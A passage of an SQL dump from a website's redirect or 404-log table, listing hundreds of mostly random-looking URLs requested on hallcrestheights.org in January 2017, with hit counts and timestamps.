00:00:00'),(1709,'http://www.hallcrestheights.org/i20162628-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-k18740-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-05 22:34:52','0000-00-00 00:00:00'),(1710,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-i20162628-njbo-k58149-gtsakbc-cgyfmdv-juxzl/',NULL,'','',1,0,'2017-01-05 22:37:39','0000-00-00 00:00:00'),(1711,'http://www.hallcrestheights.org/dvis-ciwbvwk-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-i20162634-oqqe-ludpwcme-k10812-giapxmxi.htm',NULL,'','',1,0,'2017-01-05 22:42:33','0000-00-00 00:00:00'),(1712,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-vlxt-k61040-dqkunfgl-i20162637-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-05 22:43:10','0000-00-00 00:00:00'),(1713,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k10312-sllge-ajanpd-i20162634-mefnxhq.htm',NULL,'','',1,0,'2017-01-05 22:44:43','0000-00-00 00:00:00'),(1714,'http://www.hallcrestheights.org/i20162634-gnfz-nxvjxpa-k31712-ltitj-shkyjy-ldpijaa-mdurtaen.htm',NULL,'','',2,0,'2017-01-05 22:45:47','0000-00-00 00:00:00'),(1715,'http://www.hallcrestheights.org/ajqxx-k2457-ucuzao-fifep-i20162635-hiij-imjnjbo-gtsakbcc-gyfmdvju-xzlekts/',NULL,'','',1,0,'2017-01-05 22:48:58','0000-00-00 00:00:00'),(1716,'http://www.hallcrestheights.org/mrcq-gbeifuw-grabt-nwyrqs-emgwkow-hmemxgku-i20162634-cybnpzk-icvejxku-k812-lzjc-jkntsxjl-nuuuvtff-cgyjire.htm',NULL,'','',1,0,'2017-01-05 22:54:14','0000-00-00 00:00:00'),(1717,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-i20162635-tzte-rqbwnsw-k1557-nsnjplpf-trrjncyp-joqwgzj/',NULL,'','',1,0,'2017-01-05 22:57:00','0000-00-00 00:00:00'),(1718,'http://www.hallcrestheights.org/zmku-edtzjiv-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-i20162634-ubfgnqt-pmhprbik-k21512-zonm-tlajholj-rdkltsqw-xxuijhd.htm',NULL,'','',1,0,'2017-01-05 23:06:02','0000-00-00 00:00:00'),(1719,'http://www.hallcrestheights.org/bsoap-azapst-i20162634-asgmh-cqcm-ckfrdtf-k42957-kgpvbchs-iwhorklv-zrtjrsy/',NULL,'','',1,0,'2017-01-05 23:08:05','0000-00-00 00:00:00'),(1720,'http://www.hallcrestheights.org/k10484-mrcqg-i20162633-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-05 23:10:51','0000-00-00 00:00:00'),(1721,'http://www.hallcrestheights.org/k12284-jglet-i20162633-kymd-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-05 23:13:40','0000-00-00 00:00:00'),(1722,'http://www.hallcrestheights.org/oiyiz-k43857-golrcm-i20162634-wfbsn-opdg-fnhskrl-jrgfctfz-fiwxwmak-oayosmp/',NULL,'','',1,0,'2017-01-05 23:16:22','0000-00-00 00:00:00'),(1723,'http://www.hallcrestheights.org/i20162632-k48464-fadla-jfnl-gfpc-vwgmyhde.htm',NULL,'','',1,0,'2017-01-05 23:19:08','0000-00-00 00:00:00'),(1724,'http://www.hallcrestheights.org/qlbowc-k7489-iggeceay-afxr-glnik-ghhm-i20162633-bbxpges-mrcaizt-biauw-dtvixp/',NULL,'','',1,0,'2017-01-05 23:24:40','0000-00-00 00:00:00'),(1725,'http://www.hallcrestheights.org/k11384-dvisc-i20162633-iwbv-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-01-05 23:27:27','0000-00-00 00:00:00'),(1726,'http://www.hallcrestheights.org/i20162632-k53684-lugdl-trsm-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-05 23:30:13','0000-00-00 00:00:00'),(1727,'http://www.hallcrestheights.org/k11312-edzv-dlqcomn-i20162634-nmmca-wvbfuj.htm',NULL,'','',1,0,'2017-01-05 23:35:44','0000-00-00 00:00:00'),(1728,'http://www.hallcrestheights.org/k53612-fadl-i20162633-ajfnlgf-pcvwg-myhdec.htm',NULL,'','',1,0,'2017-01-05 23:38:30','0000-00-00 00:00:00'),(1729,'http://www.hallcrestheights.org/k36800-zmkuedtz-jivyo-qxifgxuh-i20162635-xptvuhm.htm',NULL,'','',1,0,'2017-01-05 23:44:03','0000-00-00 00:00:00'),(1730,'http://www.hallcrestheights.org/tkuykf-k8389-jdnjjbuc-yupa-jaylr-lwfv-i20162633-dyruqpk-lsdefhx-dfpdf-ufpfaj/',NULL,'','',1,0,'2017-01-05 23:46:57','0000-00-00 00:00:00'),(1731,'http://www.hallcrestheights.org/k17000-dvisciwb-vwkux-krbzomsm-i20162635-vuclzup.htm',NULL,'','',1,0,'2017-01-05 23:49:34','0000-00-00 00:00:00'),(1732,'http://www.hallcrestheights.org/k15200-ryvhrhmq-tyysl-lgeajanp-i20162635-dmefnxh.htm',NULL,'','',1,0,'2017-01-05 23:55:07','0000-00-00 00:00:00'),(1733,'http://www.hallcrestheights.org/htxwhyk-k59473-rsvsv-hudykb-i20162631-qxdosf-ietyu-aixn-rbdggs-aarhef-skjydmr/',NULL,'','',1,0,'2017-01-05 23:57:53','0000-00-00 00:00:00'),(1734,'http://www.hallcrestheights.org/k37700-fadlajfn-lgfpc-vwgmyhde-i20162635-cwxbdeu.htm',NULL,'','',1,0,'2017-01-06 00:00:38','0000-00-00 00:00:00'),(1735,'http://www.hallcrestheights.org/oiyizgo-k58573-lrcmw-fbsnop-i20162631-dgfnhs-krljr-gfct-fzfiwx-wmakoa-yosmpql/',NULL,'','',1,0,'2017-01-06 00:03:27','0000-00-00 00:00:00'),(1736,'http://www.hallcrestheights.org/htxwhy-i20162629-k15949-krsvsvhu-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr/',NULL,'','',1,0,'2017-01-06 00:11:43','0000-00-00 00:00:00'),(1737,'http://www.hallcrestheights.org/i20162632-k47420-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'','',2,0,'2017-01-06 00:17:14','0000-00-00 00:00:00'),(1738,'http://www.hallcrestheights.org/useful/earthquake.html',NULL,'','',7,0,'2017-01-06 00:18:59','0000-00-00 00:00:00'),(1739,'http://www.hallcrestheights.org/i20162635-zmkued-k9916-tzjivy-oqxifg-xuhx-ptvuhm.htm',NULL,'','',3,0,'2017-01-06 00:20:01','0000-00-00 00:00:00'),(1740,'http://www.hallcrestheights.org/k49940-lugdltrs-i20162637-mxxhy-pzqjllzo-hnjumnt.htm',NULL,'','',3,0,'2017-01-06 00:28:19','0000-00-00 00:00:00'),(1741,'http://www.hallcrestheights.org/k4508-zmkuedt-zjivyoqx-i20162634-ifgxuhxp-tvuhmiw.htm',NULL,'','',3,0,'2017-01-06 00:33:52','0000-00-00 00:00:00'),(1742,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-i20162633-krbzomsm-k6964-vuclzuph.htm',NULL,'','',1,0,'2017-01-06 00:42:08','0000-00-00 00:00:00'),(1743,'http://www.hallcrestheights.org/i20162637-upttmnbe-k49690-atgrb-nqcdcncx-rdhcpgz/zdll-imvyx-jltfeo-bkeb-wivsmqkr.htm',NULL,'','',1,0,'2017-01-06 00:42:33','0000-00-00 00:00:00'),(1744,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k49790-vwgmyhde-cwxbdeu/dkov-fiibp-tquhzx-chhr-mxagfpap-i20162637-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-06 00:43:38','0000-00-00 00:00:00'),(1745,'http://www.hallcrestheights.org/k49740-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-i20162637-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-06 00:44:42','0000-00-00 00:00:00'),(1746,'http://www.hallcrestheights.org/gnfznx-k51316-vjxpal-titjsh-kyjy-i20162634-ldpija.htm',NULL,'','',3,0,'2017-01-06 00:44:55','0000-00-00 00:00:00'),(1747,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162633-abtnwyrq-k6064-semgwkow.htm',NULL,'','',1,0,'2017-01-06 00:50:27','0000-00-00 00:00:00'),(1748,'http://www.hallcrestheights.org/zmkued-k54376-tzjivy-i20162637-oqxifg-xuhx-ptvuhm.htm',NULL,'','',1,0,'2017-01-06 00:53:15','0000-00-00 00:00:00'),(1749,'http://www.hallcrestheights.org/oiyizg-i20162629-k15049-olrcmwfb-snop-dgfnh-skrl-jrgfctf-zfiwxwm-akoay-osmpql/',NULL,'','',1,0,'2017-01-06 01:01:30','0000-00-00 00:00:00'),(1750,'http://www.hallcrestheights.org/mrcqgb-k33676-eifuwg-i20162637-rabtnw-yrqs-emgwko.htm',NULL,'','',1,0,'2017-01-06 01:07:03','0000-00-00 00:00:00'),(1751,'http://www.hallcrestheights.org/zmku-edtzjiv-k48292-yoqxi-i20162628-fgxuhx-ptvuhmi.htm',NULL,'','',3,0,'2017-01-06 01:09:49','0000-00-00 00:00:00'),(1752,'http://www.hallcrestheights.org/kzpffm-k49789-sxklrded-hwge-fvbbg-i20162632-zagp-eciyyuw-uvfztji-gjina-mzbcng/',NULL,'','',1,0,'2017-01-06 01:12:34','0000-00-00 00:00:00'),(1753,'http://www.hallcrestheights.org/jglet-i20162636-kymd-rqzn-rvmlkswa-k21904-zvkecqqn.htm',NULL,'','',1,0,'2017-01-06 01:15:21','0000-00-00 00:00:00'),(1754,'http://www.hallcrestheights.org/k4400-mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko.htm',NULL,'','',1,0,'2017-01-06 01:23:48','0000-00-00 00:00:00'),(1755,'http://www.hallcrestheights.org/i20162635-k4300-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-06 01:30:49','0000-00-00 00:00:00'),(1756,'http://www.hallcrestheights.org/i20162635-k25900-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-06 01:37:49','0000-00-00 00:00:00'),(1757,'http://www.hallcrestheights.org/jgletkym-i20162635-drqzn-k25700-rvmlkswa-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-06 01:48:19','0000-00-00 00:00:00'),(1758,'http://www.hallcrestheights.org/xhajvql-k45073-wczbi-i20162630-qsosqx-oqkgqa-qydcp-tznz-vtjqoe-vpcaqw-jaluwty/',NULL,'','',1,0,'2017-01-06 01:55:17','0000-00-00 00:00:00'),(1759,'http://www.hallcrestheights.org/k4900-jgletkym-drqzn-rvmlkswa-i20162635-zvkecqq-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-06 01:58:48','0000-00-00 00:00:00'),(1760,'http://www.hallcrestheights.org/bsoapaz-k45973-apsta-i20162630-sgmhcq-cmckfr-dtfkg-pvbc-hsiwho-rklvzr-tjrsyoa/',NULL,'','',1,0,'2017-01-06 02:02:18','0000-00-00 00:00:00'),(1761,'http://hallcrestheights.org/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'http://hallcrestheights.org/','',33,0,'2017-01-06 02:12:29','0000-00-00 00:00:00'),(1762,'http://www.hallcrestheights.org/qlbowci-k60373-ggece-ayafxr-i20162631-glnikg-hhmbb-xpge-smrcai-ztbiau-wdtvixp/',NULL,'','',1,0,'2017-01-06 02:12:47','0000-00-00 00:00:00'),(1763,'http://www.hallcrestheights.org/ryvhrhmq-k25600-tyysl-lgeajanp-i20162635-dmefnxh-qfhj-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-06 02:23:19','0000-00-00 00:00:00'),(1764,'http://www.hallcrestheights.org/i20162628-wbwpbo-k58249-nkydhxjj-ikvf-vtzpx-bxkc-wjybtyl-wosduie-qgwso-gxhgpi/',NULL,'','',1,0,'2017-01-06 02:26:48','0000-00-00 00:00:00'),(1765,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-i20162633-zbsai-imjz-fozgdvd-dqjvdob-knlyk-conedw-k7989-jmax/',NULL,'','',1,0,'2017-01-06 02:30:18','0000-00-00 00:00:00'),(1766,'http://www.hallcrestheights.org/zmkuedtz-i20162635-jivyo/k27050-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-06 02:34:25','0000-00-00 00:00:00'),(1767,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k5850-vwgmyhde/i20162635-cwxbdeu-dkov-fiibp-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-06 02:36:19','0000-00-00 00:00:00'),(1768,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-i20162628-aluwty-k58749-bckb/',NULL,'','',1,0,'2017-01-06 02:47:49','0000-00-00 00:00:00'),(1769,'http://www.hallcrestheights.org/pcscqruf-k15400-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-i20162635-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-06 02:51:32','0000-00-00 00:00:00'),(1770,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-i20162635-japyvrl-k4500-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-06 02:55:28','0000-00-00 00:00:00'),(1771,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-i20162632-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-aluwty-k49389-bckb/',NULL,'','',1,0,'2017-01-06 02:58:19','0000-00-00 00:00:00'),(1772,'http://www.hallcrestheights.org/k25200-mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko-whme-mxgku-cybnpz-kicv.htm',NULL,'','',1,0,'2017-01-06 03:06:02','0000-00-00 00:00:00'),(1773,'http://www.hallcrestheights.org/ixnmueah-k4600-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-i20162635-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-06 03:08:48','0000-00-00 00:00:00'),(1774,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg-zagp-eciyyuw-uvfztji-gjina-i20162628-mzbcng-k57849-tfml/',NULL,'','',1,0,'2017-01-06 03:12:18','0000-00-00 00:00:00'),(1775,'http://www.hallcrestheights.org/edzvdlqc-k25300-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-i20162635-hmgz-nkoheyru.htm',NULL,'','',1,0,'2017-01-06 03:15:48','0000-00-00 00:00:00'),(1776,'http://www.hallcrestheights.org/k25800-pcscqruf-unpkw-xpoideot-wtvsoar-mosm-i20162635-gepla-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-06 03:19:18','0000-00-00 00:00:00'),(1777,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik-ghhm-bbxpges-mrcaizt-biauw-dtvixp-i20162629-k15549-mtzh/',NULL,'','',1,0,'2017-01-06 03:26:17','0000-00-00 00:00:00'),(1778,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-k4800-qfhj-dyhao-xrcjhw-uvds-vezytwlc-i20162635-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-06 03:36:48','0000-00-00 00:00:00'),(1779,'http://www.hallcrestheights.org/nfrko-k1657-pdobbu-mgolz-esrk-wtzqtqb-svjcwjbx-nmyvsssl-i20162635-djznaah-jbkwxros/',NULL,'','',1,0,'2017-01-06 03:40:18','0000-00-00 00:00:00'),(1780,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k25500-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-cwqzhrib-i20162635-nknyfeeb-sbjhfk.htm',NULL,'','',1,0,'2017-01-06 03:43:49','0000-00-00 00:00:00'),(1781,'http://www.hallcrestheights.org/qlbowci-i20162631-ggece-ayafxr-k59073-glnikg-hhmbb-xpge-smrcai-ztbiau-wdtvixp-mtzhz/',NULL,'','',1,0,'2017-01-06 03:50:48','0000-00-00 00:00:00'),(1782,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-i20162635-fgvf-k4700-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-06 03:54:17','0000-00-00 00:00:00'),(1783,'http://www.hallcrestheights.org/i20162630-htxwhyk-rsvsv-hudykb-k46473-qxdosf-ietyu-aixn-rbdggs-aarhef-skjydmr-ujwim/',NULL,'','',1,0,'2017-01-06 03:59:14','0000-00-00 00:00:00'),(1784,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-i20162635-ytni-k25400-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-06 04:01:19','0000-00-00 00:00:00'),(1785,'http://www.hallcrestheights.org/i20162632-k32984-ryvhr-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-06 04:08:18','0000-00-00 00:00:00'),(1786,'http://www.hallcrestheights.org/i20162630-oiyizgo-lrcmw-fbsnop-k45573-dgfnhs-krljr-gfct-fzfiwx-wmakoa-yosmpql-gvegd/',NULL,'','',1,0,'2017-01-06 04:11:48','0000-00-00 00:00:00'),(1787,'http://www.hallcrestheights.org/k36430-upttmnbe-i20162636-atgrb/nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-06 04:16:06','0000-00-00 00:00:00'),(1788,'http://www.hallcrestheights.org/k15730-fadlajfn-i20162636-lgfpc/vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-01-06 04:18:01','0000-00-00 00:00:00'),(1789,'http://www.hallcrestheights.org/i20162632-k31184-zmkue-dtzj-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-06 04:18:48','0000-00-00 00:00:00'),(1790,'http://www.hallcrestheights.org/tkuykfj-i20162631-dnjjb-ucyupa-k59973-jaylrl-wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza/',NULL,'','',1,0,'2017-01-06 04:22:18','0000-00-00 00:00:00'),(1791,'http://www.hallcrestheights.org/k32912-dvis-ciwbvwk-i20162634-uxkrb-zomsmv.htm',NULL,'','',1,0,'2017-01-06 04:32:49','0000-00-00 00:00:00'),(1792,'http://www.hallcrestheights.org/k52712-zmku-i20162633-edtzjiv-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-06 04:36:18','0000-00-00 00:00:00'),(1793,'http://www.hallcrestheights.org/bsoapa-i20162629-zapstasg-mhcq-cmckf/rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu-k5699-kcmbqrmk/',NULL,'','',1,0,'2017-01-06 04:38:52','0000-00-00 00:00:00'),(1794,'http://www.hallcrestheights.org/tkuyk-k43957-fjdnjj-bucyu-paja-ylrlwfv-dyruqpkl-i20162634-sdefhxdf-pdfufpf-ajnpvzat/',NULL,'','',1,0,'2017-01-06 04:43:18','0000-00-00 00:00:00'),(1795,'http://www.hallcrestheights.org/k5400-gnfznxvj-xpalt-itjshkyj-i20162635-yldpija-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',8,0,'2017-01-06 04:46:16','0000-00-00 00:00:00'),(1796,'http://www.hallcrestheights.org/k54512-ryvh-i20162633-rhmqtyy-sllge-ajanpd.htm',NULL,'','',1,0,'2017-01-06 04:46:47','0000-00-00 00:00:00'),(1797,'http://www.hallcrestheights.org/qlbow-k43057-ciggec-eayaf-xrgl-nikghhm-bbxpgesm-i20162634-rcaiztbi-auwdtvi-xpmtzhzz/',NULL,'','',1,0,'2017-01-06 04:50:19','0000-00-00 00:00:00'),(1798,'http://www.hallcrestheights.org/zmkuedt-k53128-zjivyoqx-ifgxuhxp-tvuhmiw-i20162632-nzkorp-vubfg-nqtpmhpr-bikz-onmtla.htm',NULL,'','',1,0,'2017-01-06 04:55:59','0000-00-00 00:00:00'),(1799,'http://www.hallcrestheights.org/k12212-gnfz-nxvjxpa-i20162634-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-01-06 04:57:18','0000-00-00 00:00:00'),(1800,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt-zpxbxkc-i20162635-wjybtylw-osduieqg-k1257-wsogxhg-pisdhtni-rmjhv/',NULL,'','',1,0,'2017-01-06 05:00:48','0000-00-00 00:00:00'),(1801,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv-bbgzagp-i20162635-eciyyuwu-vfztjigj-k2157-inamzbc-ngtfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-06 05:04:17','0000-00-00 00:00:00'),(1802,'http://www.hallcrestheights.org/i20162628-k9440-edzvdlqc-omnnm-mcawvbfu-japyvrl.htm',NULL,'','',1,0,'2017-01-06 05:07:48','0000-00-00 00:00:00'),(1803,'http://www.hallcrestheights.org/i20162628-k30140-mrcqgbei-fuwgr-abtnwyrq-semgwko.htm',NULL,'','',1,0,'2017-01-06 05:11:18','0000-00-00 00:00:00'),(1804,'http://www.hallcrestheights.org/k40220-ixnmueah-whioz-hjxbnwpg-i20162631-eyooayi.htm',NULL,'','',1,0,'2017-01-06 05:14:48','0000-00-00 00:00:00'),(1805,'http://www.hallcrestheights.org/i20162628-k29240-ryvhrhmq-tyysl-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-06 05:18:18','0000-00-00 00:00:00'),(1806,'http://www.hallcrestheights.org/k50840-zmkuedtz-i20162637-jivyo-qxifgxuh-xptvuhm.htm',NULL,'','',1,0,'2017-01-06 05:25:18','0000-00-00 00:00:00'),(1807,'http://www.hallcrestheights.org/k39320-pcscqruf-unpkw-xpoideot-i20162631-wtvsoar.htm',NULL,'','',1,0,'2017-01-06 05:28:48','0000-00-00 00:00:00'),(1808,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb-i20162634-saiimjz-fozgdvdd-qjvdobkn-k43557-lykcone-dwjmaxev-ortbz/',NULL,'','',1,0,'2017-01-06 05:39:19','0000-00-00 00:00:00'),(1809,'http://www.hallcrestheights.org/k9728-upttmnb-i20162633-eatgrbnq-cdcncxrd-hcpgzzd.htm',NULL,'','',1,0,'2017-01-06 05:42:48','0000-00-00 00:00:00'),(1810,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum-zbsaii-i20162630-mjzfo-zgdv-ddqjvd-obknly-k45273-kconedw-jmaxe-vortb/',NULL,'','',1,0,'2017-01-06 05:46:18','0000-00-00 00:00:00'),(1811,'http://www.hallcrestheights.org/lugd-ltrsmxx-k54412-hypzq-i20162633-jllzoh-njumnte.htm',NULL,'','',1,0,'2017-01-06 05:49:47','0000-00-00 00:00:00'),(1812,'http://www.hallcrestheights.org/i20162632-k31328-ixnmuea-hwhiozhj-xbnwpgey-ooayiku.htm',NULL,'','',1,0,'2017-01-06 05:53:17','0000-00-00 00:00:00'),(1813,'http://www.hallcrestheights.org/i20162632-k52028-edzvdlq-comnnmmc-awvbfuja-pyvrlfl.htm',NULL,'','',1,0,'2017-01-06 06:03:49','0000-00-00 00:00:00'),(1814,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-terqbw-i20162630-nswns-njpl-k46173-pftrrj-ncypjo-qwgzjev-ihsdp-acayl/',NULL,'','',1,0,'2017-01-06 06:07:18','0000-00-00 00:00:00'),(1815,'http://www.hallcrestheights.org/lugd-ltrsmxx-k31012-hypzq-jllzoh-i20162634-njumnte.htm',NULL,'','',1,0,'2017-01-06 06:17:49','0000-00-00 00:00:00'),(1816,'http://www.hallcrestheights.org/k58773-ajqxxuc-uzaof-ifephi-ijimjn-jbogt-i20162631-sakb-ccgyfm-dvjuxz-lektsls-hxosq-qjvfy/',NULL,'','',1,0,'2017-01-06 06:21:18','0000-00-00 00:00:00'),(1817,'http://www.hallcrestheights.org/fadl-ajfnlgf-k32812-pcvwg-myhdec-i20162634-wxbdeud.htm',NULL,'','',1,0,'2017-01-06 06:24:48','0000-00-00 00:00:00'),(1818,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_2015.html',NULL,'','',5,0,'2017-01-06 06:25:15','0000-00-00 00:00:00'),(1819,'http://www.hallcrestheights.org/i20162632-k32228-vqjnysp-vholjpeu-rrtpiluo-urxivlb.htm',NULL,'','',1,0,'2017-01-06 06:28:18','0000-00-00 00:00:00'),(1820,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-zlsxx-i20162631-qrox-aehksk-xyxemb-uqudtwq-k59673-ceyvu-ciwqw/',NULL,'','',1,0,'2017-01-06 06:35:19','0000-00-00 00:00:00'),(1821,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162633-vwgmyhde-k11284-cwxbdeud.htm',NULL,'','',1,0,'2017-01-06 06:38:48','0000-00-00 00:00:00'),(1822,'http://www.hallcrestheights.org/k7689-nfrkop-dobbumgo-lzes-rkwtz-qtqb-svjcwjb-xnmyvss-i20162633-sldjz-naahjb-kwxr-osholvgw/',NULL,'','',1,0,'2017-01-06 06:42:19','0000-00-00 00:00:00'),(1823,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162633-vwgmyhde-k27664-cwxbdeud.htm',NULL,'','',1,0,'2017-01-06 06:52:48','0000-00-00 00:00:00'),(1824,'http://www.hallcrestheights.org/vqjn-yspvhol-k52612-jpeur-i20162633-rtpilu-ourxivl.htm',NULL,'','',1,0,'2017-01-06 06:56:18','0000-00-00 00:00:00'),(1825,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k53584-eyooayik.htm',NULL,'','',1,0,'2017-01-06 06:59:48','0000-00-00 00:00:00'),(1826,'http://www.hallcrestheights.org/lugdl-trsm-i20162632-xxhy-pzqjllzo-k32884-hnjumnte.htm',NULL,'','',1,0,'2017-01-06 07:03:17','0000-00-00 00:00:00'),(1827,'http://www.hallcrestheights.org/uptt-mnbeatg-k53512-rbnqc-i20162633-dcncxr-dhcpgzz.htm',NULL,'','',1,0,'2017-01-06 07:13:47','0000-00-00 00:00:00'),(1828,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-i20162629-k15249-ijimj-njbo-gtsakbc-cgyfmdv-juxzl-ektsls-hxos-qqjvfyoi/',NULL,'','',1,0,'2017-01-06 07:20:48','0000-00-00 00:00:00'),(1829,'http://www.hallcrestheights.org/dvis-ciwbvwk-k12112-uxkrb-zomsmv-i20162634-uclzuph.htm',NULL,'','',1,0,'2017-01-06 07:24:18','0000-00-00 00:00:00'),(1830,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-lwfv-k49989-dyruqpk-i20162632-lsdefhx-dfpdf-ufpfaj-npvz-attuxdwv/',NULL,'','',1,0,'2017-01-06 07:27:49','0000-00-00 00:00:00'),(1831,'http://www.hallcrestheights.org/qlbowc-iggeceay-i20162628-afxr-glnik-ghhm-bbxpges-k58449-mrcaizt-biauw-dtvixp-mtzh-zzwzrqrd/',NULL,'','',1,0,'2017-01-06 07:31:18','0000-00-00 00:00:00'),(1832,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-i20162633-qxifgxuh-k10384-xptvuhmi.htm',NULL,'','',1,0,'2017-01-06 07:34:48','0000-00-00 00:00:00'),(1833,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k12184-dmefnxhq.htm',NULL,'','',1,0,'2017-01-06 07:45:18','0000-00-00 00:00:00'),(1834,'http://www.hallcrestheights.org/i20162630-edzv-dlqcomn-k44332-nmmca-wvbfuj-apyvrlf.htm',NULL,'','',2,0,'2017-01-06 07:52:17','0000-00-00 00:00:00'),(1835,'http://www.hallcrestheights.org/i20162635-k26800-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf.htm',NULL,'https://www.google.co.jp/','',10,0,'2017-01-06 07:52:55','0000-00-00 00:00:00'),(1836,'http://www.hallcrestheights.org/k9340-mrcqgbei-fuwgr-abtnwyrq-i20162628-semgwko-whme.htm',NULL,'','',1,0,'2017-01-06 07:59:21','0000-00-00 00:00:00'),(1837,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx-dosfiet-yuaixnrb-dggsaarh-efskjyd-mrujwimj-i20162635-k1857-qiaau-rihc/',NULL,'','',1,0,'2017-01-06 08:33:58','0000-00-00 00:00:00'),(1838,'http://www.hallcrestheights.org/k4120-jgletkym-drqzn-i20162632-rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-06 08:34:18','0000-00-00 00:00:00'),(1839,'http://www.hallcrestheights.org/k8440-ryvhrhmq-tyysl-lgeajanp-i20162628-dmefnxh-qfhj.htm',NULL,'','',5,0,'2017-01-06 08:41:18','0000-00-00 00:00:00'),(1840,'http://www.hallcrestheights.org/k5920-gnfznxvj-xpalt-i20162632-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-06 08:48:21','0000-00-00 00:00:00'),(1841,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-dggsaarh-efskjyd-mrujwimj-i20162635-k14727-qiaau-rihc/',NULL,'','',1,0,'2017-01-06 08:51:34','0000-00-00 00:00:00'),(1842,'http://www.hallcrestheights.org/k5020-edzvdlqc-omnnm-i20162632-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-06 08:58:49','0000-00-00 